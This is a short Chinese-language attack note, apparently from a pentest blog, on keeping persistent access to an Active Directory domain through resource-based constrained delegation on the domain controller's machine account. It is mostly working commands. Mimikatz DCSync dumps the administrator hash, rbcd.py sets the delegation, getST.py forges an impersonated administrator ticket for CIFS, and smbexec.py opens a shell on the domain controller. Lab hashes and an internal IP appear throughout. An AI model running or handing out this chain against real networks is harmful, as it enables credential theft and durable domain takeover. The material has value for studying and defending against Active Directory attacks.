域内委派维权
为某个服务账户配置 krbtgt 用户的非约束性委派或基于资源的约束性委派。这里我的 krbtgt 的基于资源约束性委派我利用不了,所以使用的是域控的机器账户 dc01$ 进行维权。
抓取所有 hash。
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\administrator /csv" "exit" 这里很多账号都是如下 hash,是因为他们的密码都是一样的。 9099d68602a60f007c227c4fa95fada6 9099d68602a60f007c227c4fa95fada6
给机器账户 dc01$ 配置 machine$ 的基于资源的约束性委派
python ./rbcd.py -f comp1 -t dc01 -dc-ip 192.168.72.21 HACKER\\administrator -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6
以 administrator 请求 cifs/dc01.HACK.com 票据
# 以 administrator 请求 cifs/dc01.HACK.com 票据 python3 getST.py -dc-ip 192.168.72.21 HACK.com/machine$ -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 -spn cifs/dc01.HACK.com -impersonate administrator export KRB5CCNAME=administrator@cifs_dc01.HACK.com@HACK.COM.ccache python3 smbexec.py -no-pass -k dc01.HACK.com
